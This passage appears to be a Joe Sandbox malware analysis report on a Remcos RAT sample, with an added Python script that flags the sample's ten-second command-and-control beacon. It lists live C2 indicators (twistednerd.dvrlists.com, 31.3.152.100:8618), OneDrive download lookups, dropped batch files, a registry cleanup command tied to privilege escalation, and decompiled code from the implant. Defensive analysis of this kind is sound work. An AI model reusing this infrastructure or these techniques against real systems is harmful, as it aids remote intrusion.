                  Sep 16, 2021 07:32:04.660557985 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:32:04.664980888 CEST | 49768 | 8618 | 192.168.2.4 | 31.3.152.100
                  Sep 16, 2021 07:32:04.846687078 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:32:14.663853884 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:32:14.667356014 CEST | 49768 | 8618 | 192.168.2.4 | 31.3.152.100
                  Sep 16, 2021 07:32:14.851214886 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:32:24.671042919 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:32:24.677238941 CEST | 49768 | 8618 | 192.168.2.4 | 31.3.152.100
                  Sep 16, 2021 07:32:24.870946884 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:32:34.672107935 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:32:34.677838087 CEST | 49768 | 8618 | 192.168.2.4 | 31.3.152.100
                  Sep 16, 2021 07:32:34.873157978 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:32:44.676422119 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:32:44.678942919 CEST | 49768 | 8618 | 192.168.2.4 | 31.3.152.100
                  Sep 16, 2021 07:32:44.866179943 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:32:54.689173937 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:32:54.703861952 CEST | 49768 | 8618 | 192.168.2.4 | 31.3.152.100
                  Sep 16, 2021 07:32:54.889919996 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:33:04.691196918 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:33:04.694382906 CEST | 49768 | 8618 | 192.168.2.4 | 31.3.152.100
                  Sep 16, 2021 07:33:04.878144026 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:33:14.749455929 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
                  Sep 16, 2021 07:33:14.751158953 CEST | 49768 | 8618 | 192.168.2.4 | 31.3.152.100
                  Sep 16, 2021 07:33:14.933299065 CEST | 8618 | 49768 | 31.3.152.100 | 192.168.2.4
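After the initial exchange at 07:31:43-44, the TCP table above settles into one short exchange on 31.3.152.100:8618 roughly every ten seconds; that regularity is what a C2 beacon detector keys on. The script below is an added example and is not part of the Joe Sandbox report. It takes rows transcribed from the table, groups them per flow direction, and estimates the period with the median and the median absolute deviation of inter-arrival times, so the handshake burst at the start does not mask the keepalive cadence. Only the outbound direction (the implant's own packets) comes out periodic; the server-side reverse flow is dominated by its sub-second replies and is correctly not flagged. The thresholds (at least five intervals, jitter within 10% of the period, period of at least one second) are assumptions.

```python
"""Beacon-interval check for the report's 192.168.2.4 -> 31.3.152.100:8618 flow.

Added example, not part of the Joe Sandbox report.  Rows are transcribed from
the report's "TCP Packets" table (time, source port, destination port, source
IP, destination IP).  All outbound packets are kept; of the reverse direction
only the initial burst and two keepalive replies are kept to stay short.
"""
from collections import defaultdict
from dataclasses import dataclass
from statistics import median

RAW = """
07:31:43.595730066 49768 8618 192.168.2.4 31.3.152.100
07:31:43.736527920 8618 49768 31.3.152.100 192.168.2.4
07:31:43.739193916 49768 8618 192.168.2.4 31.3.152.100
07:31:43.768744946 49768 8618 192.168.2.4 31.3.152.100
07:31:43.919629097 8618 49768 31.3.152.100 192.168.2.4
07:31:43.961529970 49768 8618 192.168.2.4 31.3.152.100
07:31:44.102533102 8618 49768 31.3.152.100 192.168.2.4
07:31:44.110025883 49768 8618 192.168.2.4 31.3.152.100
07:31:44.295824051 8618 49768 31.3.152.100 192.168.2.4
07:31:44.297333956 49768 8618 192.168.2.4 31.3.152.100
07:31:44.481712103 8618 49768 31.3.152.100 192.168.2.4
07:31:44.630225897 8618 49768 31.3.152.100 192.168.2.4
07:31:44.637145042 49768 8618 192.168.2.4 31.3.152.100
07:31:44.830382109 8618 49768 31.3.152.100 192.168.2.4
07:31:54.642986059 8618 49768 31.3.152.100 192.168.2.4
07:31:54.678993940 49768 8618 192.168.2.4 31.3.152.100
07:31:54.863089085 8618 49768 31.3.152.100 192.168.2.4
07:32:04.660557985 8618 49768 31.3.152.100 192.168.2.4
07:32:04.664980888 49768 8618 192.168.2.4 31.3.152.100
07:32:04.846687078 8618 49768 31.3.152.100 192.168.2.4
07:32:14.667356014 49768 8618 192.168.2.4 31.3.152.100
07:32:24.677238941 49768 8618 192.168.2.4 31.3.152.100
07:32:34.677838087 49768 8618 192.168.2.4 31.3.152.100
07:32:44.678942919 49768 8618 192.168.2.4 31.3.152.100
07:32:54.703861952 49768 8618 192.168.2.4 31.3.152.100
07:33:04.694382906 49768 8618 192.168.2.4 31.3.152.100
07:33:14.751158953 49768 8618 192.168.2.4 31.3.152.100
"""


def to_seconds(ts: str) -> float:
    """'HH:MM:SS.fffffffff' -> seconds since midnight (sub-second text kept)."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def parse(raw: str):
    """Yield (seconds, sport, dport, src, dst) for every non-empty row."""
    for line in raw.strip().splitlines():
        ts, sport, dport, src, dst = line.split()
        yield to_seconds(ts), int(sport), int(dport), src, dst


@dataclass
class FlowStats:
    flow: tuple       # (src, dst, dport)
    intervals: int    # number of inter-arrival samples
    period: float     # median inter-arrival time, seconds
    jitter: float     # median absolute deviation from that period
    is_beacon: bool


def beacon_stats(packets, min_intervals=5, max_jitter_ratio=0.1, min_period=1.0):
    """Per flow direction: robust period estimate and a beacon verdict.

    median/MAD rather than mean/stddev so a handful of burst packets at
    connection start cannot pull the estimate away from the steady cadence.
    """
    by_flow = defaultdict(list)
    for t, _sport, dport, src, dst in packets:
        by_flow[(src, dst, dport)].append(t)
    results = []
    for flow, times in by_flow.items():
        times.sort()
        deltas = [b - a for a, b in zip(times, times[1:])]
        if len(deltas) < min_intervals:
            continue
        period = median(deltas)
        jitter = median([abs(d - period) for d in deltas])
        verdict = period >= min_period and jitter <= max_jitter_ratio * period
        results.append(FlowStats(flow, len(deltas), period, jitter, verdict))
    return results


def beacons(raw: str = RAW):
    """Flows whose inter-arrival times look like a fixed-interval beacon."""
    return [s for s in beacon_stats(parse(raw)) if s.is_beacon]


if __name__ == "__main__":
    for s in beacon_stats(parse(RAW)):
        print(f"{s.flow}: n={s.intervals} period={s.period:.3f}s "
              f"jitter={s.jitter:.3f}s beacon={s.is_beacon}")
```

The same grouping applied to a full capture, keyed on the tuple a NetFlow or Zeek conn log already gives you, is a cheap first pass; the 10% jitter bound should be loosened for implants that add random sleep to their interval.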

                  UDP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Sep 16, 2021 07:31:02.042660952 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:31:02.077795029 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:31:30.998838902 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:31:31.026519060 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:31:31.875191927 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:31:31.935653925 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:31:34.007265091 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:31:34.045097113 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:31:43.441859007 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:31:43.579870939 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:31:54.579904079 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:31:54.610949993 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:31:56.943455935 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:31:57.056242943 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:31:57.855884075 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:31:57.934079885 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:31:58.123680115 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:31:58.157845974 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:31:58.783854008 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:31:58.818857908 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:31:59.269623041 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:31:59.296689034 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:31:59.949897051 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:31:59.991151094 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:32:00.865252972 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:32:00.895874977 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:32:01.908340931 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:32:01.935410976 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:32:04.079628944 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:32:04.137729883 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:32:05.308572054 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:32:05.341655970 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:32:05.901374102 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:32:05.929481030 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:32:15.383393049 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:32:15.409832954 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:32:52.692359924 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:32:52.736159086 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:32:54.774735928 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:32:54.801294088 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:32:58.330287933 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:32:58.356807947 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:32:59.193892002 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:32:59.251439095 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:33:04.316589117 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:33:04.359231949 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
                  Sep 16, 2021 07:33:04.899002075 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
                  Sep 16, 2021 07:33:04.927767038 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4

                  DNS Queries

                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                  Sep 16, 2021 07:31:30.998838902 CEST | 192.168.2.4 | 8.8.8.8 | 0xc325 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
                  Sep 16, 2021 07:31:31.875191927 CEST | 192.168.2.4 | 8.8.8.8 | 0xf786 | Standard query (0) | qclvzw.sn.files.1drv.com | A (IP address) | IN (0x0001)
                  Sep 16, 2021 07:31:43.441859007 CEST | 192.168.2.4 | 8.8.8.8 | 0x5f51 | Standard query (0) | twistednerd.dvrlists.com | A (IP address) | IN (0x0001)
                  Sep 16, 2021 07:32:58.330287933 CEST | 192.168.2.4 | 8.8.8.8 | 0xa29c | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
                  Sep 16, 2021 07:32:59.193892002 CEST | 192.168.2.4 | 8.8.8.8 | 0x7c2f | Standard query (0) | qclvzw.sn.files.1drv.com | A (IP address) | IN (0x0001)
                  Sep 16, 2021 07:33:04.316589117 CEST | 192.168.2.4 | 8.8.8.8 | 0x5cf9 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
                  Sep 16, 2021 07:33:04.899002075 CEST | 192.168.2.4 | 8.8.8.8 | 0x61fa | Standard query (0) | qclvzw.sn.files.1drv.com | A (IP address) | IN (0x0001)

                  DNS Answers

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Sep 16, 2021 07:31:31.026519060 CEST | 8.8.8.8 | 192.168.2.4 | 0xc325 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                  Sep 16, 2021 07:31:31.935653925 CEST | 8.8.8.8 | 192.168.2.4 | 0xf786 | No error (0) | qclvzw.sn.files.1drv.com | sn-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
                  Sep 16, 2021 07:31:31.935653925 CEST | 8.8.8.8 | 192.168.2.4 | 0xf786 | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                  Sep 16, 2021 07:31:43.579870939 CEST | 8.8.8.8 | 192.168.2.4 | 0x5f51 | No error (0) | twistednerd.dvrlists.com | | 31.3.152.100 | A (IP address) | IN (0x0001)
                  Sep 16, 2021 07:32:58.356807947 CEST | 8.8.8.8 | 192.168.2.4 | 0xa29c | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                  Sep 16, 2021 07:32:59.251439095 CEST | 8.8.8.8 | 192.168.2.4 | 0x7c2f | No error (0) | qclvzw.sn.files.1drv.com | sn-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
                  Sep 16, 2021 07:32:59.251439095 CEST | 8.8.8.8 | 192.168.2.4 | 0x7c2f | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                  Sep 16, 2021 07:33:04.359231949 CEST | 8.8.8.8 | 192.168.2.4 | 0x5cf9 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                  Sep 16, 2021 07:33:04.927767038 CEST | 8.8.8.8 | 192.168.2.4 | 0x61fa | No error (0) | qclvzw.sn.files.1drv.com | sn-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
                  Sep 16, 2021 07:33:04.927767038 CEST | 8.8.8.8 | 192.168.2.4 | 0x61fa | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)

                  System Behavior

                  General

                  Start time:07:31:06
                  Start date:16/09/2021
                  Path:C:\Users\user\Desktop\IQl00lxPjo.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\IQl00lxPjo.exe'
                  Imagebase:0x400000
                  File size:811520 bytes
                  MD5 hash:9B8AE8EDFE553EDEA6108DCEEBCC57B8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:low

                  General

                  Start time:07:31:35
                  Start date:16/09/2021
                  Path:C:\Windows\SysWOW64\DpiScaling.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\System32\DpiScaling.exe
                  Imagebase:0xe50000
                  File size:77312 bytes
                  MD5 hash:302B1BBDBF4D96BEE99C6B45680CEB5E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Author: unknown
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Author: unknown
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp, Author: Joe Security
                  Reputation:moderate

                  General

                  Start time:07:31:43
                  Start date:16/09/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
                  Imagebase:0x11d0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:31:43
                  Start date:16/09/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff724c50000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:31:44
                  Start date:16/09/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                  Imagebase:0x11d0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:31:44
                  Start date:16/09/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff724c50000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:31:44
                  Start date:16/09/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
                  Imagebase:0x11d0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:31:45
                  Start date:16/09/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff724c50000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:31:45
                  Start date:16/09/2021
                  Path:C:\Users\Public\Libraries\Dsqbhgvf.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\Public\Libraries\Dsqbhgvf.exe'
                  Imagebase:0x400000
                  File size:811520 bytes
                  MD5 hash:9B8AE8EDFE553EDEA6108DCEEBCC57B8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Antivirus matches:
                  • Detection: 32%, Virustotal
                  Reputation:low

                  General

                  Start time:07:31:46
                  Start date:16/09/2021
                  Path:C:\Windows\SysWOW64\reg.exe
                  Wow64 process (32bit):true
                  Commandline:reg delete hkcu\Environment /v windir /f
                  Imagebase:0x12b0000
                  File size:59392 bytes
                  MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:31:46
                  Start date:16/09/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff724c50000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:31:54
                  Start date:16/09/2021
                  Path:C:\Users\Public\Libraries\Dsqbhgvf.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\Public\Libraries\Dsqbhgvf.exe'
                  Imagebase:0x400000
                  File size:811520 bytes
                  MD5 hash:9B8AE8EDFE553EDEA6108DCEEBCC57B8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:low

                  General

                  Start time:07:33:04
                  Start date:16/09/2021
                  Path:C:\Windows\SysWOW64\dialer.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\System32\dialer.exe
                  Imagebase:0xf50000
                  File size:32768 bytes
                  MD5 hash:F176211F7372248224D02AC023573870
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:07:33:09
                  Start date:16/09/2021
                  Path:C:\Windows\SysWOW64\dialer.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\System32\dialer.exe
                  Imagebase:0xf50000
                  File size:32768 bytes
                  MD5 hash:F176211F7372248224D02AC023573870
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Disassembly

                  Code Analysis


                    Executed Functions

                    Non-executed Functions

                    Memory Dump Source
                    • Source File: 00000000.00000003.669014139.000000000230C000.00000004.00000001.sdmp, Offset: 0230C000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 112b845aaa59789d8d3785aa2ecc0b2cdba3a89ab765bc4be3e67aabbb604bb6
                    • Instruction ID: 7dda19885c99708f9e306bdc16b2a97035d61d49d79f90f3e8bb7b5f86c882ae
                    • Opcode Fuzzy Hash: 112b845aaa59789d8d3785aa2ecc0b2cdba3a89ab765bc4be3e67aabbb604bb6
                    • Instruction Fuzzy Hash: 85E022F2B8050032F230A99C9CD2F8B914AC7C5769F194231F204EB6D1C9A8CC0656B8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Executed Functions

                    C-Code - Quality: 100%
                    			E0040CD09() {
                    				struct HINSTANCE__* _t1;
                    				_Unknown_base(*)()* _t2;
                    				_Unknown_base(*)()* _t24;
                    
                    				_t1 = LoadLibraryA("Psapi.dll"); // executed
                    				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
                    				 *0x46bd2c = _t2;
                    				if(_t2 == 0) {
                    					 *0x46bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                    				}
                    				 *0x46bd1c = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
                    				if( *0x46bd2c == 0) {
                    					 *0x46bd1c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                    				}
                    				 *0x46bd24 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
                    				 *0x46bd10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                    				 *0x46beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                    				 *0x46beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
                    				 *0x46bd20 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
                    				 *0x46bd14 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
                    				 *0x46bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
                    				 *0x46bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
                    				 *0x46bd18 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
                    				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                    				 *0x46bb04 = _t24;
                    				return _t24;
                    			}






                    Instruction addresses (listing column, one per decompiled statement): 0x0040cd1c 0x0040cd25 0x0040cd2d 0x0040cd34 0x0040cd45 0x0040cd45 0x0040cd60 0x0040cd65 0x0040cd76 0x0040cd76 0x0040cd94 0x0040cda8 0x0040cdbc 0x0040cdd0 0x0040cde4 0x0040cdf8 0x0040ce0c 0x0040ce20 0x0040ce31 0x0040ce39 0x0040ce3d 0x0040ce43

                    APIs
                    • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00000000,Sept-AITAB5,00000001,0040C505), ref: 0040CD1C
                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD25
                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040CD40
                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD43
                    • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040CD54
                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD57
                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040CD71
                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD74
                    • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040CD85
                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD88
                    • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040CD99
                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD9C
                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040CDAD
                    • GetProcAddress.KERNEL32(00000000), ref: 0040CDB0
                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040CDC1
                    • GetProcAddress.KERNEL32(00000000), ref: 0040CDC4
                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040CDD5
                    • GetProcAddress.KERNEL32(00000000), ref: 0040CDD8
                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040CDE9
                    • GetProcAddress.KERNEL32(00000000), ref: 0040CDEC
                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040CDFD
                    • GetProcAddress.KERNEL32(00000000), ref: 0040CE00
                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040CE11
                    • GetProcAddress.KERNEL32(00000000), ref: 0040CE14
                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040CE25
                    • GetProcAddress.KERNEL32(00000000), ref: 0040CE28
                    • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040CE36
                    • GetProcAddress.KERNEL32(00000000), ref: 0040CE39
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: AddressProc$HandleModule$LibraryLoad
                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$Sept-AITAB5$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
                    • API String ID: 551388010-280768746
                    • Opcode ID: 9e74a4b7297bf2b2a58517a95ccdf4e1be594d5622eed8d1bc547594be329630
                    • Instruction ID: 7f0a72ef543637f7c74f83f283374f20c8e911501c3ee670a040c0af445c8e1c
                    • Opcode Fuzzy Hash: 9e74a4b7297bf2b2a58517a95ccdf4e1be594d5622eed8d1bc547594be329630
                    • Instruction Fuzzy Hash: 1F21AEA0E8135875D620BBB29C49E1B2E58DA44B95B204927F205D7191FFFCC540CEEF
                    Uniqueness

                    Uniqueness Score: -1.00%
